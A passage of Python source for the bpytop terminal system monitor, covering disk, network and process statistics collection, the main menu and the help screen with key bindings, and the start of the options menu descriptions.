cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
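#* When use_fstab is enabled, build the mountpoint filter once from the non-swap entries in /etc/fstab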
if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
try:
with open('/etc/fstab','r') as fstab:
for line in fstab:
line = line.strip()
if line and not line.startswith('#'):
mount_data = (line.split())
if mount_data[2].lower() != "swap":
cls.fstab_filter += [mount_data[1]]
errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
except IOError:
CONFIG.use_fstab = False
errlog.debug(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
if not CONFIG.use_fstab and cls.fstab_filter:
cls.fstab_filter = []
errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
disk_io = None
io_string = ""
if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
continue
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
#while disk_name in disk_list: disk_name += "_"
disk_list += [disk_name]
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
continue
#elif filtering and disk_name.endswith(filtering)
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
continue  #* Skip disks where disk_usage fails to avoid referencing an unset disk_u
u_percent = round(disk_u.percent)
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM == "Linux":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if dev_name.startswith("md"):
try:
dev_name = dev_name[:dev_name.index("p")]
except:
pass
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp))
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp))
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if MemBox.disks_width > 30:
if disk_read > 0:
io_string += f'▲{floating_humanizer(disk_read, short=True)} '
if disk_write > 0:
io_string += f'▼{floating_humanizer(disk_write, short=True)}'
elif disk_read + disk_write > 0:
io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if disk_list != cls.old_disks:
MemBox.redraw = True
cls.old_disks = disk_list.copy()
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[network device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_lower] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
net_iface: str = CONFIG.net_iface
sync_top: int = 0
sync_string: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nics = []
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
if cls.net_iface and cls.net_iface in cls.nics:
cls.nic = cls.net_iface
cls.nic_i = cls.nics.index(cls.nic)
@classmethod
def switch(cls, key: str):
if cls.net_iface: cls.net_iface = ""
if len(cls.nics) < 2 and cls.nic in cls.nics:
return
if cls.nic_i == -1:
cls.nic_i = 0 if key == "n" else -1
else:
cls.nic_i += +1 if key == "n" else -1
cls.nic_i %= len(cls.nics)
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
old_nic = cls.nic
cls._get_nics()
cls.nic = old_nic
if cls.nic not in cls.nics:
cls.nic_i = -1
else:
cls.nic_i = cls.nics.index(cls.nic)
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
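#* Pre-compiled sort expressions, eval:ed against each psutil process info dict in _collect() and _tree()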
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processes with pid, name, arguments, threads, username, memory percent and cpu percent'''
if not "proc" in Box.boxes: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: str = cls.search_filter
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
for s in search.split(","):
if s.strip() in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
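#* expand = how many optional detail columns (threads, nice, io read/write, tty) fit beside the detailed graph, capped at 5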
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str):
'''List all processes in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
for s in search.split(","):
if s.strip() in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
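#* Inside a collapsed branch (and not searching): fold this process stats into the collapsed parent row instead of adding a new line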
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up) (Down)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left) (Right)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a string to filter processes with.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (T, t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (K, k)" : "Kill selected process with SIGKILL - 9.",
"Selected (I, i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "h", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
selected_cat: str = ""
selected_int: int = 0
option_items: Dict[str, List[str]] = {}
cat_list: List[str] = []
cat_int: int = 0
change_cat: bool = False
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
categories: Dict[str, Dict[str, List[str]]] = {
"system" : {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"shown_boxes" : [
'Manually set which boxes to show.',
'',
'Available values are "cpu mem net proc".',
'Separate values with whitespace.',
'',
'Toggle between presets with mode key "m".'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'Only visible if cpu box is enabled.',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to False if the menus are flickering',
